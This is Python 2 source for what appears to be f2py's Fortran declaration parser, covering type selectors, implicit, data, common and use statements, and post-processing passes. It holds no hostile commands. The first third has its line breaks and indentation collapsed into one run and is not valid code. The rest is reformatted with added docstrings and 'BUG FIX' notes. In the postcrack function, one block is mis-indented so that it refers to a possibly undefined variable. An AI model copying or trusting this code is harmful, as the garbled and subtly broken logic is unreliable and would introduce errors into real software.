outmess('analyzeline: could not extract name,expr in parameter statement "%s" of "%s"\n'%(e,ll));continue params = get_parameters(edecl) k=rmbadname1(k) if k not in edecl: edecl[k]={} if '=' in edecl[k] and (not edecl[k]['=']==initexpr): outmess('analyzeline: Overwriting the value 
of parameter "%s" ("%s") with "%s".\n'%(k,edecl[k]['='],initexpr)) t = determineexprtype(initexpr,params) if t: if t.get('typespec')=='real': tt = list(initexpr) for m in real16pattern.finditer(initexpr): tt[m.start():m.end()] = list(\ initexpr[m.start():m.end()].lower().replace('d', 'e')) initexpr = ''.join(tt) elif t.get('typespec')=='complex': initexpr = initexpr[1:].lower().replace('d','e').\ replace(',','+1j*(') try: v = eval(initexpr,{},params) except (SyntaxError,NameError,TypeError),msg: errmess('analyzeline: Failed to evaluate %r. Ignoring: %s\n'\ % (initexpr, msg)) continue edecl[k]['='] = repr(v) if 'attrspec' in edecl[k]: edecl[k]['attrspec'].append('parameter') else: edecl[k]['attrspec']=['parameter'] last_name = k groupcache[groupcounter]['vars']=edecl if last_name is not None: previous_context = ('variable',last_name,groupcounter) elif case=='implicit': if m.group('after').strip().lower()=='none': groupcache[groupcounter]['implicit']=None elif m.group('after'): if 'implicit' in groupcache[groupcounter]: impl=groupcache[groupcounter]['implicit'] else: impl={} if impl is None: outmess('analyzeline: Overwriting earlier "implicit none" statement.\n') impl={} for e in markoutercomma(m.group('after')).split('@,@'): decl={} m1=re.match(r'\s*(?P<this>.*?)\s*(\(\s*(?P<after>[a-z-, ]+)\s*\)\s*|)\Z',e,re.I) if not m1: outmess('analyzeline: could not extract info of implicit statement part "%s"\n'%(e));continue m2=typespattern4implicit.match(m1.group('this')) if not m2: outmess('analyzeline: could not extract types pattern of implicit statement part "%s"\n'%(e));continue typespec,selector,attr,edecl=cracktypespec0(m2.group('this'),m2.group('after')) kindselect,charselect,typename=cracktypespec(typespec,selector) decl['typespec']=typespec decl['kindselector']=kindselect decl['charselector']=charselect decl['typename']=typename for k in decl.keys(): if not decl[k]: del decl[k] for r in markoutercomma(m1.group('after')).split('@,@'): if '-' in r: try: 
begc,endc=[x.strip() for x in r.split('-')] except: outmess('analyzeline: expected "<char>-<char>" instead of "%s" in range list of implicit statement\n'%r);continue else: begc=endc=r.strip() if not len(begc)==len(endc)==1: outmess('analyzeline: expected "<char>-<char>" instead of "%s" in range list of implicit statement (2)\n'%r);continue for o in range(ord(begc),ord(endc)+1): impl[chr(o)]=decl groupcache[groupcounter]['implicit']=impl elif case=='data': ll=[] dl='';il='';f=0;fc=1;inp=0 for c in m.group('after'): if not inp: if c=="'": fc=not fc if c=='/' and fc: f=f+1;continue if c=='(': inp = inp + 1 elif c==')': inp = inp - 1 if f==0: dl=dl+c elif f==1: il=il+c elif f==2: dl = dl.strip() if dl.startswith(','): dl = dl[1:].strip() ll.append([dl,il]) dl=c;il='';f=0 if f==2: dl = dl.strip() if dl.startswith(','): dl = dl[1:].strip() ll.append([dl,il]) vars={} if 'vars' in groupcache[groupcounter]: vars=groupcache[groupcounter]['vars'] last_name = None for l in ll: l=[x.strip() for x in l] if l[0][0]==',':l[0]=l[0][1:] if l[0][0]=='(': outmess('analyzeline: implied-DO list "%s" is not supported. Skipping.\n'%l[0]) continue #if '(' in l[0]: # #outmess('analyzeline: ignoring this data statement.\n') # continue i=0;j=0;llen=len(l[1]) for v in rmbadname([x.strip() for x in markoutercomma(l[0]).split('@,@')]): if v[0]=='(': outmess('analyzeline: implied-DO list "%s" is not supported. Skipping.\n'%v) # XXX: subsequent init expressions may get wrong values. # Ignoring since data statements are irrelevant for wrapping. 
continue fc=0 while (i<llen) and (fc or not l[1][i]==','): if l[1][i]=="'": fc=not fc i=i+1 i=i+1 #v,l[1][j:i-1]=name,initvalue if v not in vars: vars[v]={} if '=' in vars[v] and not vars[v]['=']==l[1][j:i-1]: outmess('analyzeline: changing init expression of "%s" ("%s") to "%s"\n'%(v,vars[v]['='],l[1][j:i-1])) vars[v]['=']=l[1][j:i-1] j=i last_name = v groupcache[groupcounter]['vars']=vars if last_name is not None: previous_context = ('variable',last_name,groupcounter) elif case=='common': line=m.group('after').strip() if not line[0]=='/':line='//'+line cl=[] f=0;bn='';ol='' for c in line: if c=='/':f=f+1;continue if f>=3: bn = bn.strip() if not bn: bn='_BLNK_' cl.append([bn,ol]) f=f-2;bn='';ol='' if f%2: bn=bn+c else: ol=ol+c bn = bn.strip() if not bn: bn='_BLNK_' cl.append([bn,ol]) commonkey={} if 'common' in groupcache[groupcounter]: commonkey=groupcache[groupcounter]['common'] for c in cl: if c[0] in commonkey: outmess('analyzeline: previously defined common block encountered. Skipping.\n') continue commonkey[c[0]]=[] for i in [x.strip() for x in markoutercomma(c[1]).split('@,@')]: if i: commonkey[c[0]].append(i) groupcache[groupcounter]['common']=commonkey previous_context = ('common',bn,groupcounter) elif case=='use': m1=re.match(r'\A\s*(?P<name>\b[\w]+\b)\s*((,(\s*\bonly\b\s*:|(?P<notonly>))\s*(?P<list>.*))|)\s*\Z',m.group('after'),re.I) if m1: mm=m1.groupdict() if 'use' not in groupcache[groupcounter]: groupcache[groupcounter]['use']={} name=m1.group('name') groupcache[groupcounter]['use'][name]={} isonly=0 if 'list' in mm and mm['list'] is not None: if 'notonly' in mm and mm['notonly'] is None: isonly=1 groupcache[groupcounter]['use'][name]['only']=isonly ll=[x.strip() for x in mm['list'].split(',')] rl={} for l in ll: if '=' in l: m2=re.match(r'\A\s*(?P<local>\b[\w]+\b)\s*=\s*>\s*(?P<use>\b[\w]+\b)\s*\Z',l,re.I) if m2: rl[m2.group('local').strip()]=m2.group('use').strip() else: outmess('analyzeline: Not local=>use pattern found in %s\n'%`l`) else: 
rl[l]=l groupcache[groupcounter]['use'][name]['map']=rl else: pass else: print m.groupdict() outmess('analyzeline: Could not crack the use statement.\n') elif case in ['f2pyenhancements']: if 'f2pyenhancements' not in groupcache[groupcounter]: groupcache[groupcounter]['f2pyenhancements'] = {} d = groupcache[groupcounter]['f2pyenhancements'] if m.group('this')=='usercode' and 'usercode' in d: if type(d['usercode']) is type(''): d['usercode'] = [d['usercode']] d['usercode'].append(m.group('after')) else: d[m.group('this')] = m.group('after') elif case=='multiline': if previous_context is None: if verbose: outmess('analyzeline: No context for multiline block.\n') return gc = groupcounter #gc = previous_context[2] appendmultiline(groupcache[gc], previous_context[:2], m.group('this')) else: if verbose>1: print m.groupdict() outmess('analyzeline: No code implemented for line.\n') def appendmultiline(group, context_name,ml): if 'f2pymultilines' not in group: group['f2pymultilines'] = {} d = group['f2pymultilines'] if context_name not in d: d[context_name] = [] d[context_name].append(ml) return def cracktypespec0(typespec,ll): selector=None attr=None if re.match(r'double\s*complex',typespec,re.I): typespec='double complex' elif re.match(r'double\s*precision',typespec,re.I): typespec='double precision' else: typespec=typespec.strip().lower() m1=selectpattern.match(markouterparen(ll)) if not m1: outmess('cracktypespec0: no kind/char_selector pattern found for line.\n') return d=m1.groupdict() for k in d.keys(): d[k]=unmarkouterparen(d[k]) if typespec in ['complex','integer','logical','real','character','type']: selector=d['this'] ll=d['after'] i=ll.find('::') if i>=0: attr=ll[:i].strip() ll=ll[i+2:] return typespec,selector,attr,ll ##### namepattern=re.compile(r'\s*(?P<name>\b[\w]+\b)\s*(?P<after>.*)\s*\Z',re.I) kindselector=re.compile(r'\s*(\(\s*(kind\s*=)?\s*(?P<kind>.*)\s*\)|[*]\s*(?P<kind2>.*?))\s*\Z',re.I) 
# Selector patterns: char-length/kind selectors and the entity tail
# (array spec, length, init expression) of a declaration.
charselector = re.compile(r'\s*(\((?P<lenkind>.*)\)|[*]\s*(?P<charlen>.*))\s*\Z', re.I)
lenkindpattern = re.compile(r'\s*(kind\s*=\s*(?P<kind>.*?)\s*(@,@\s*len\s*=\s*(?P<len>.*)|)|(len\s*=\s*|)(?P<len2>.*?)\s*(@,@\s*(kind\s*=\s*|)(?P<kind2>.*)|))\s*\Z', re.I)
lenarraypattern = re.compile(r'\s*(@\(@\s*(?!/)\s*(?P<array>.*?)\s*@\)@\s*[*]\s*(?P<len>.*?)|([*]\s*(?P<len2>.*?)|)\s*(@\(@\s*(?!/)\s*(?P<array2>.*?)\s*@\)@|))\s*(=\s*(?P<init>.*?)|(@\(@|)/\s*(?P<init2>.*?)\s*/(@\)@|)|)\s*\Z', re.I)

def removespaces(expr):
    """Remove blanks from *expr* except between two identifier characters
    (so a space that separates a keyword from a name is kept)."""
    expr = expr.strip()
    if len(expr) <= 1:
        return expr
    expr2 = expr[0]
    for i in range(1, len(expr) - 1):
        if expr[i] == ' ' and \
           ((expr[i + 1] in "()[]{}=+-/* ") or (expr[i - 1] in "()[]{}=+-/* ")):
            continue
        expr2 = expr2 + expr[i]
    expr2 = expr2 + expr[-1]
    return expr2

def markinnerspaces(line):
    """Replace each blank inside a quoted string of *line* with '@_@' so
    later splitting on spaces does not break string literals.

    Handles any number of single- or double-quoted strings and backslash
    escapes.  BUG FIX: the original code had an unreachable
    ``elif c==cc: f=f-1`` branch (same condition as the preceding ``if``),
    so the quote counter never decreased and only blanks inside the first
    quoted string were protected.  Explicit in-string state fixes that.
    """
    out = ''
    instring = 0
    quotechar = ''
    prevchar = ''
    for c in line:
        if prevchar == '\\' and c in ['\\', '\'', '"']:
            # escaped character inside a string: copy verbatim
            out = out + c
            prevchar = c
            continue
        if not instring and c in ['\'', '"']:
            instring = 1
            quotechar = c
        elif instring and c == quotechar:
            instring = 0
        elif c == ' ' and instring:
            out = out + '@_@'
            # note: prevchar deliberately not updated here (original behavior)
            continue
        out = out + c
        prevchar = c
    return out

def updatevars(typespec, selector, attrspec, entitydecl):
    """Crack the entity declaration list *entitydecl* of one type statement
    and merge the resulting per-name declarations into the variables of the
    current group (``groupcache[groupcounter]['vars']``).

    Returns the last entity name processed, or None.
    """
    global groupcache, groupcounter
    last_name = None
    kindselect, charselect, typename = cracktypespec(typespec, selector)
    if attrspec:
        # normalize attribute keywords to lower case (keep their arguments)
        attrspec = [x.strip() for x in markoutercomma(attrspec).split('@,@')]
        cleaned = []
        attr_start_re = re.compile(r'(?P<start>[a-zA-Z]+)')
        for a in attrspec:
            if not a:
                continue
            m = attr_start_re.match(a)
            if m:
                s = m.group('start').lower()
                a = s + a[len(s):]
            cleaned.append(a)
        attrspec = cleaned
    # split the entity list on outer commas, then on outer spaces, while
    # protecting blanks inside quoted strings via markinnerspaces
    el = [x.strip() for x in markoutercomma(entitydecl).split('@,@')]
    el1 = []
    for e in el:
        for e1 in [x.strip() for x in markoutercomma(removespaces(markinnerspaces(e)), comma=' ').split('@ @')]:
            if e1:
                el1.append(e1.replace('@_@', ' '))
    for e in el1:
        m = namepattern.match(e)
        if not m:
            outmess('updatevars: no name pattern found for entity=%s. Skipping.\n' % (repr(e)))
            continue
        ename = rmbadname1(m.group('name'))
        edecl = {}
        if ename in groupcache[groupcounter]['vars']:
            # the name was seen before: merge, warning on contradictions
            edecl = groupcache[groupcounter]['vars'][ename].copy()
            not_has_typespec = 'typespec' not in edecl
            if not_has_typespec:
                edecl['typespec'] = typespec
            elif typespec and (not typespec == edecl['typespec']):
                outmess('updatevars: attempt to change the type of "%s" ("%s") to "%s". Ignoring.\n' % (ename, edecl['typespec'], typespec))
            if 'kindselector' not in edecl:
                edecl['kindselector'] = copy.copy(kindselect)
            elif kindselect:
                for k in kindselect.keys():
                    if k in edecl['kindselector'] and (not kindselect[k] == edecl['kindselector'][k]):
                        outmess('updatevars: attempt to change the kindselector "%s" of "%s" ("%s") to "%s". Ignoring.\n' % (k, ename, edecl['kindselector'][k], kindselect[k]))
                    else:
                        edecl['kindselector'][k] = copy.copy(kindselect[k])
            if 'charselector' not in edecl and charselect:
                if not_has_typespec:
                    edecl['charselector'] = charselect
                else:
                    errmess('updatevars:%s: attempt to change empty charselector to %r. Ignoring.\n'
                            % (ename, charselect))
            elif charselect:
                for k in charselect.keys():
                    if k in edecl['charselector'] and (not charselect[k] == edecl['charselector'][k]):
                        outmess('updatevars: attempt to change the charselector "%s" of "%s" ("%s") to "%s". Ignoring.\n' % (k, ename, edecl['charselector'][k], charselect[k]))
                    else:
                        edecl['charselector'][k] = copy.copy(charselect[k])
            if 'typename' not in edecl:
                edecl['typename'] = typename
            elif typename and (not edecl['typename'] == typename):
                outmess('updatevars: attempt to change the typename of "%s" ("%s") to "%s". Ignoring.\n' % (ename, edecl['typename'], typename))
            if 'attrspec' not in edecl:
                edecl['attrspec'] = copy.copy(attrspec)
            elif attrspec:
                for a in attrspec:
                    if a not in edecl['attrspec']:
                        edecl['attrspec'].append(a)
        else:
            # first declaration of this name
            edecl['typespec'] = copy.copy(typespec)
            edecl['kindselector'] = copy.copy(kindselect)
            edecl['charselector'] = copy.copy(charselect)
            edecl['typename'] = typename
            edecl['attrspec'] = copy.copy(attrspec)
        if m.group('after'):
            # crack the entity tail: array spec, char length, init expression
            m1 = lenarraypattern.match(markouterparen(m.group('after')))
            if m1:
                d1 = m1.groupdict()
                for lk in ['len', 'array', 'init']:
                    if d1[lk + '2'] is not None:
                        d1[lk] = d1[lk + '2']
                        del d1[lk + '2']
                # iterate over a copy of the keys: entries are deleted below
                for k in list(d1.keys()):
                    if d1[k] is not None:
                        d1[k] = unmarkouterparen(d1[k])
                    else:
                        del d1[k]
                if 'len' in d1 and 'array' in d1:
                    if d1['len'] == '':
                        d1['len'] = d1['array']
                        del d1['array']
                    else:
                        d1['array'] = d1['array'] + ',' + d1['len']
                        del d1['len']
                        errmess('updatevars: "%s %s" is mapped to "%s %s(%s)"\n' % (typespec, e, typespec, ename, d1['array']))
                if 'array' in d1:
                    dm = 'dimension(%s)' % d1['array']
                    if 'attrspec' not in edecl or (not edecl['attrspec']):
                        edecl['attrspec'] = [dm]
                    else:
                        edecl['attrspec'].append(dm)
                        for dm1 in edecl['attrspec']:
                            if dm1[:9] == 'dimension' and dm1 != dm:
                                del edecl['attrspec'][-1]
                                errmess('updatevars:%s: attempt to change %r to %r. Ignoring.\n'
                                        % (ename, dm1, dm))
                                break
                if 'len' in d1:
                    if typespec in ['complex', 'integer', 'logical', 'real']:
                        if ('kindselector' not in edecl) or (not edecl['kindselector']):
                            edecl['kindselector'] = {}
                        edecl['kindselector']['*'] = d1['len']
                    elif typespec == 'character':
                        if ('charselector' not in edecl) or (not edecl['charselector']):
                            edecl['charselector'] = {}
                        if 'len' in edecl['charselector']:
                            del edecl['charselector']['len']
                        edecl['charselector']['*'] = d1['len']
                if 'init' in d1:
                    if '=' in edecl and (not edecl['='] == d1['init']):
                        outmess('updatevars: attempt to change the init expression of "%s" ("%s") to "%s". Ignoring.\n' % (ename, edecl['='], d1['init']))
                    else:
                        edecl['='] = d1['init']
            else:
                outmess('updatevars: could not crack entity declaration "%s". Ignoring.\n' % (ename + m.group('after')))
        # drop empty entries (copy the keys: we delete while scanning)
        for k in list(edecl.keys()):
            if not edecl[k]:
                del edecl[k]
        groupcache[groupcounter]['vars'][ename] = edecl
        if 'varnames' in groupcache[groupcounter]:
            groupcache[groupcounter]['varnames'].append(ename)
        last_name = ename
    return last_name
def cracktypespec(typespec, selector):
    """Crack a type *selector* string into ``(kindselect, charselect, typename)``.

    Exactly one of the three results is populated depending on *typespec*:
    a kind-selector dict for numeric/logical types, a char-selector dict for
    'character', or the derived-type name for 'type'.  Unused results are
    None.
    """
    kindselect = None
    charselect = None
    typename = None
    if selector:
        if typespec in ['complex', 'integer', 'logical', 'real']:
            kindselect = kindselector.match(selector)
            if not kindselect:
                outmess('cracktypespec: no kindselector pattern found for %s\n' % (repr(selector)))
                # NOTE(review): bare return (None) here, while the normal path
                # returns a 3-tuple; callers that unpack would fail on this
                # path -- confirm it is never taken before changing it.
                return
            kindselect = kindselect.groupdict()
            kindselect['*'] = kindselect['kind2']
            del kindselect['kind2']
            # drop empty groups; iterate over a copy since entries are deleted
            for k in list(kindselect.keys()):
                if not kindselect[k]:
                    del kindselect[k]
            for k, i in kindselect.items():
                kindselect[k] = rmbadname1(i)
        elif typespec == 'character':
            charselect = charselector.match(selector)
            if not charselect:
                outmess('cracktypespec: no charselector pattern found for %s\n' % (repr(selector)))
                return
            charselect = charselect.groupdict()
            charselect['*'] = charselect['charlen']
            del charselect['charlen']
            if charselect['lenkind']:
                lenkind = lenkindpattern.match(markoutercomma(charselect['lenkind']))
                lenkind = lenkind.groupdict()
                for lk in ['len', 'kind']:
                    if lenkind[lk + '2']:
                        lenkind[lk] = lenkind[lk + '2']
                    charselect[lk] = lenkind[lk]
                    del lenkind[lk + '2']
            del charselect['lenkind']
            for k in list(charselect.keys()):
                if not charselect[k]:
                    del charselect[k]
            for k, i in charselect.items():
                charselect[k] = rmbadname1(i)
        elif typespec == 'type':
            typename = re.match(r'\s*\(\s*(?P<name>\w+)\s*\)', selector, re.I)
            if typename:
                typename = typename.group('name')
            else:
                outmess('cracktypespec: no typename found in %s\n' % (repr(typespec + selector)))
        else:
            outmess('cracktypespec: no selector used for %s\n' % (repr(selector)))
    return kindselect, charselect, typename
######

def setattrspec(decl, attr, force=0):
    """Append attribute *attr* to ``decl['attrspec']`` (in place) and return
    *decl*.

    Duplicates are skipped unless *force* is true.  Conflicting visibility
    attributes are ignored: 'public' is not added when 'private' is already
    present and vice versa.  BUG FIX: previously the trailing ``else``
    appended the attribute even when these conflict guards failed, making
    them ineffective.
    """
    if not decl:
        decl = {}
    if not attr:
        return decl
    if 'attrspec' not in decl:
        decl['attrspec'] = [attr]
        return decl
    if force:
        decl['attrspec'].append(attr)
    if attr in decl['attrspec']:
        return decl
    if attr == 'static' and 'automatic' not in decl['attrspec']:
        decl['attrspec'].append(attr)
    elif attr == 'automatic' and 'static' not in decl['attrspec']:
        decl['attrspec'].append(attr)
    elif attr == 'public':
        if 'private' not in decl['attrspec']:
            decl['attrspec'].append(attr)
    elif attr == 'private':
        if 'public' not in decl['attrspec']:
            decl['attrspec'].append(attr)
    else:
        decl['attrspec'].append(attr)
    return decl
def setkindselector(decl, sel, force=0):
    """Merge kind-selector dict *sel* into *decl* (in place) and return it.
    Existing keys win unless *force* is true."""
    if not decl:
        decl = {}
    if not sel:
        return decl
    if 'kindselector' not in decl:
        decl['kindselector'] = sel
        return decl
    target = decl['kindselector']
    for key in sel.keys():
        if force or key not in target:
            target[key] = sel[key]
    return decl

def setcharselector(decl, sel, force=0):
    """Merge char-selector dict *sel* into *decl* (in place) and return it.
    Existing keys win unless *force* is true."""
    if not decl:
        decl = {}
    if not sel:
        return decl
    if 'charselector' not in decl:
        decl['charselector'] = sel
        return decl
    target = decl['charselector']
    for key in sel.keys():
        if force or key not in target:
            target[key] = sel[key]
    return decl

def getblockname(block, unknown='unknown'):
    """Return the block's name, or *unknown* when it has none."""
    return block.get('name', unknown)

###### post processing

def setmesstext(block):
    """Record the block's position in the module-level *filepositiontext*
    used to prefix diagnostic messages; blocks lacking 'from'/'name' are
    silently skipped."""
    global filepositiontext
    try:
        filepositiontext = 'In: %s:%s\n' % (block['from'], block['name'])
    except:
        pass

def get_usedict(block):
    """Accumulate the 'use' mappings of *block* and all its ancestors;
    entries of inner blocks override those inherited from parents."""
    usedict = {}
    if 'parent_block' in block:
        usedict = get_usedict(block['parent_block'])
    if 'use' in block:
        usedict.update(block['use'])
    return usedict

def get_useparameters(block, param_map=None):
    """Collect parameter values made visible to *block* through USE
    statements, consulting the global f90modulevars table.  Returns (and
    fills) *param_map*."""
    global f90modulevars
    if param_map is None:
        param_map = {}
    usedict = get_usedict(block)
    if not usedict:
        return param_map
    for usename, mapping in usedict.items():
        usename = usename.lower()
        if usename not in f90modulevars:
            outmess('get_useparameters: no module %s info used by %s\n'
                    % (usename, block.get('name')))
            continue
        mvars = f90modulevars[usename]
        params = get_parameters(mvars)
        if not params:
            continue
        # XXX: apply mapping
        if mapping:
            errmess('get_useparameters: mapping for %s not impl.' % (mapping))
        for k, v in params.items():
            if k in param_map:
                outmess('get_useparameters: overriding parameter %s with'
                        ' value from module %s' % (repr(k), repr(usename)))
            param_map[k] = v
    return param_map
def postcrack2(block, tab='', param_map=None):
    """Second post-processing pass: substitute parameter values imported
    via USE into kind selectors, recursing through block bodies.

    Accepts a single block dict or a list of them; returns the same shape.
    No-op unless the global f90modulevars table has been populated.
    """
    global f90modulevars
    if not f90modulevars:
        return block
    if type(block)==types.ListType:
        ret = []
        for g in block:
            g = postcrack2(g,tab=tab+'\t',param_map=param_map)
            ret.append(g)
        return ret
    setmesstext(block)
    outmess('%sBlock: %s\n'%(tab,block['name']),0)
    if param_map is None:
        param_map = get_useparameters(block)
    if param_map is not None and 'vars' in block:
        vars = block['vars']
        for n in vars.keys():
            var = vars[n]
            if 'kindselector' in var:
                kind = var['kindselector']
                if 'kind' in kind:
                    val = kind['kind']
                    # replace a symbolic kind by its value from a used module
                    if val in param_map:
                        kind['kind'] = param_map[val]
    new_body = []
    for b in block['body']:
        b = postcrack2(b,tab=tab+'\t',param_map=param_map)
        new_body.append(b)
    block['body'] = new_body
    return block

def postcrack(block, args=None, tab=''):
    """Main post-processing pass over a cracked block (or list of blocks):
    analyzes arguments, common blocks, variables and body, and builds a
    synthetic ``<name>__user__routines`` python module for any external
    (callback) arguments.

    TODO: function return values; determine expression types if in
    argument list.
    """
    global usermodules,onlyfunctions
    if type(block)==types.ListType:
        gret=[]
        uret=[]
        for g in block:
            setmesstext(g)
            g=postcrack(g,tab=tab+'\t')
            if 'name' in g and '__user__' in g['name']: # sort user routines to appear first
                uret.append(g)
            else:
                gret.append(g)
        return uret+gret
    setmesstext(block)
    if (not type(block)==types.DictType) and 'block' not in block:
        raise Exception('postcrack: Expected block dictionary instead of ' + \
                        str(block))
    if 'name' in block and not block['name']=='unknown_interface':
        outmess('%sBlock: %s\n'%(tab,block['name']),0)
    blocktype=block['block']
    block=analyzeargs(block)
    block=analyzecommon(block)
    block['vars']=analyzevars(block)
    block['sortvars']=sortvarnames(block['vars'])
    if 'args' in block and block['args']:
        args=block['args']
    block['body']=analyzebody(block,args,tab=tab)
    userisdefined=[]
    if 'use' in block:
        useblock=block['use']
        for k in useblock.keys():
            if '__user__' in k:
                userisdefined.append(k)
    else:
        useblock={}
    name=''
    if 'name' in block:
        name=block['name']
    if 'externals' in block and block['externals']:# and not userisdefined: # Build a __user__ module
        interfaced=[]
        if 'interfaced' in block:
            interfaced=block['interfaced']
        mvars=copy.copy(block['vars'])
        if name:
            mname=name+'__user__routines'
        else:
            mname='unknown__user__routines'
        # make the synthetic module name unique among user-defined ones
        if mname in userisdefined:
            i=1
            while '%s_%i'%(mname,i) in userisdefined:
                i=i+1
            mname='%s_%i'%(mname,i)
        interface={'block':'interface','body':[],'vars':{},'name':name+'_user_interface'}
        for e in block['externals']:
            if e in interfaced:
                # move the explicit interface body of e into the user module
                edef=[]
                j=-1
                for b in block['body']:
                    j=j+1
                    if b['block']=='interface':
                        i=-1
                        for bb in b['body']:
                            i=i+1
                            if 'name' in bb and bb['name']==e:
                                edef=copy.copy(bb)
                                del b['body'][i]
                                break
                        if edef:
                            if not b['body']:
                                del block['body'][j]
                            del interfaced[interfaced.index(e)]
                            break
                interface['body'].append(edef)
            else:
                if e in mvars and not isexternal(mvars[e]):
                    interface['vars'][e]=mvars[e]
    if interface['vars'] or interface['body']:
            block['interfaced']=interfaced
            mblock={'block':'python module','body':[interface],'vars':{},'name':mname,'interfaced':block['externals']}
            useblock[mname]={}
            usermodules.append(mblock)
    if useblock:
        block['use']=useblock
    return block
def sortvarnames(vars):
    """Return the names of *vars* ordered so that every name appears after
    the names listed in its 'depend' entry.

    Names without dependencies keep their original relative order.  If a
    dependency cycle is detected, it is reported via errmess and the
    unresolvable names are appended in their current order.
    """
    resolved = []
    pending = []
    for name in vars.keys():
        if 'depend' in vars[name] and vars[name]['depend']:
            pending.append(name)
        else:
            resolved.append(name)
    limit = len(pending)
    rotations = 0
    while pending:
        # XXX: How to catch dependence cycles correctly?
        head = pending[0]
        blocked = 0
        for other in pending[1:]:
            if other in vars[head]['depend']:
                blocked = 1
                break
        if blocked:
            # head still waits on a later pending name: rotate it to the back
            pending = pending[1:] + [head]
            rotations = rotations + 1
            if rotations > limit:
                errmess('sortvarnames: failed to compute dependencies because'
                        ' of cyclic dependencies between '
                        + ', '.join(pending) + '\n')
                resolved = resolved + pending
                break
        else:
            resolved.append(head)
            pending = pending[1:]
            limit = len(pending)
            rotations = 0
    return resolved
def analyzecommon(block):
    """Post-process COMMON block info: extract '<name>[(<dims>)]' items,
    attach dimension attrspecs to the corresponding variables, and record
    all common member names in block['commonvars']."""
    if not hascommon(block): return block
    commonvars=[]
    for k in block['common'].keys():
        comvars=[]
        for e in block['common'][k]:
            m=re.match(r'\A\s*\b(?P<name>.*?)\b\s*(\((?P<dims>.*?)\)|)\s*\Z',e,re.I)
            if m:
                dims=[]
                if m.group('dims'):
                    dims=[x.strip() for x in markoutercomma(m.group('dims')).split('@,@')]
                n=m.group('name').strip()
                if n in block['vars']:
                    if 'attrspec' in block['vars'][n]:
                        block['vars'][n]['attrspec'].append('dimension(%s)'%(','.join(dims)))
                    else:
                        block['vars'][n]['attrspec']=['dimension(%s)'%(','.join(dims))]
                else:
                    if dims:
                        block['vars'][n]={'attrspec':['dimension(%s)'%(','.join(dims))]}
                    else: block['vars'][n]={}
                if n not in commonvars: commonvars.append(n)
            else:
                # keep the raw entry so the common list stays aligned
                n=e
                errmess('analyzecommon: failed to extract "<name>[(<dims>)]" from "%s" in common /%s/.\n'%(e,k))
            comvars.append(n)
        block['common'][k]=comvars
    if 'commonvars' not in block:
        block['commonvars']=commonvars
    else:
        block['commonvars']=block['commonvars']+commonvars
    return block

def analyzebody(block, args, tab=''):
    """Recursively post-process the sub-blocks of *block*, honoring the
    global skipfuncs/onlyfuncs filters, collecting python modules into
    usermodules and module variables into f90modulevars.  Returns the new
    body list."""
    global usermodules,skipfuncs,onlyfuncs,f90modulevars
    setmesstext(block)
    body=[]
    for b in block['body']:
        b['parent_block'] = block
        if b['block'] in ['function','subroutine']:
            if args is not None and b['name'] not in args:
                continue
            else:
                as_=b['args']
            if b['name'] in skipfuncs:
                continue
            if onlyfuncs and b['name'] not in onlyfuncs:
                continue
            # keep a pretty-printed copy of the routine's interface
            b['saved_interface'] = crack2fortrangen(b, '\n'+' '*6, as_interface=True)
        else: as_=args
        b=postcrack(b,as_,tab=tab+'\t')
        if b['block']=='interface' and not b['body']:
            if 'f2pyenhancements' not in b:
                continue
        if b['block'].replace(' ','')=='pythonmodule':
            usermodules.append(b)
        else:
            if b['block']=='module':
                f90modulevars[b['name']] = b['vars']
            body.append(b)
    return body
def buildimplicitrules(block):
    """Return (implicitrules, attrrules) for *block*: the implicit typing
    table (None for IMPLICIT NONE) and per-letter attribute rules.

    NOTE(review): implicitrules aliases the module-level
    defaultimplicitrules, so the assignment below mutates the shared
    default table for all subsequently processed routines -- confirm this
    is intended before relying on it.
    """
    setmesstext(block)
    implicitrules=defaultimplicitrules
    attrrules={}
    if 'implicit' in block:
        if block['implicit'] is None:
            implicitrules=None
            if verbose>1:
                outmess('buildimplicitrules: no implicit rules for routine %s.\n'%`block['name']`)
        else:
            for k in block['implicit'].keys():
                if block['implicit'][k].get('typespec') not in ['static','automatic']:
                    implicitrules[k]=block['implicit'][k]
                else:
                    attrrules[k]=block['implicit'][k]['typespec']
    return implicitrules,attrrules

def myeval(e, g=None, l=None):
    """eval *e* and return the result only when it is a plain int or float;
    anything else raises ValueError."""
    r = eval(e,g,l)
    if type(r) in [type(0),type(0.0)]: return r
    raise ValueError('r=%r' % (r))

getlincoef_re_1 = re.compile(r'\A\b\w+\b\Z',re.I)
def getlincoef(e, xset): # e = a*x+b ; x in xset
    """Try to interpret expression *e* as linear, a*x+b, in one of the
    symbols of *xset*.  Returns (a, b, x) on success, else (None, None, None).
    The coefficients are probed numerically by substituting 0, 1, 0.5 and
    1.5 for x and checking linearity."""
    try:
        c = int(myeval(e,{},{}))
        return 0,c,None
    except: pass
    if getlincoef_re_1.match(e):
        return 1,0,e
    len_e = len(e)
    for x in xset:
        if len(x)>len_e: continue
        if re.search(r'\w\s*\([^)]*\b'+x+r'\b', e):
            # skip function calls having x as an argument, e.g max(1, x)
            continue
        re_1 = re.compile(r'(?P<before>.*?)\b'+x+r'\b(?P<after>.*)',re.I)
        m = re_1.match(e)
        if m:
            try:
                # substitute every occurrence of x by a trial value
                m1 = re_1.match(e)
                while m1:
                    ee = '%s(%s)%s'%(m1.group('before'),0,m1.group('after'))
                    m1 = re_1.match(ee)
                b = myeval(ee,{},{})
                m1 = re_1.match(e)
                while m1:
                    ee = '%s(%s)%s'%(m1.group('before'),1,m1.group('after'))
                    m1 = re_1.match(ee)
                a = myeval(ee,{},{}) - b
                m1 = re_1.match(e)
                while m1:
                    ee = '%s(%s)%s'%(m1.group('before'),0.5,m1.group('after'))
                    m1 = re_1.match(ee)
                c = myeval(ee,{},{})
                # computing another point to be sure that expression is linear
                m1 = re_1.match(e)
                while m1:
                    ee = '%s(%s)%s'%(m1.group('before'),1.5,m1.group('after'))
                    m1 = re_1.match(ee)
                c2 = myeval(ee,{},{})
                if (a*0.5+b==c and a*1.5+b==c2):
                    return a,b,x
            except: pass
            break
    return None,None,None

_varname_match = re.compile(r'\A[a-z]\w*\Z').match
def getarrlen(dl, args, star='*'):
    """Compute the length expression of a dimension given as bounds
    dl=[lower, upper] over argument names *args*.

    Returns (length_expr, argname, inverse_suffix); argname/inverse are
    only set when the length depends linearly on a single argument, so the
    caller can solve back for that argument.
    """
    edl = []
    # evaluate each bound to an int where possible, else keep the text
    try: edl.append(myeval(dl[0],{},{}))
    except: edl.append(dl[0])
    try: edl.append(myeval(dl[1],{},{}))
    except: edl.append(dl[1])
    if type(edl[0]) is type(0):
        p1 = 1-edl[0]
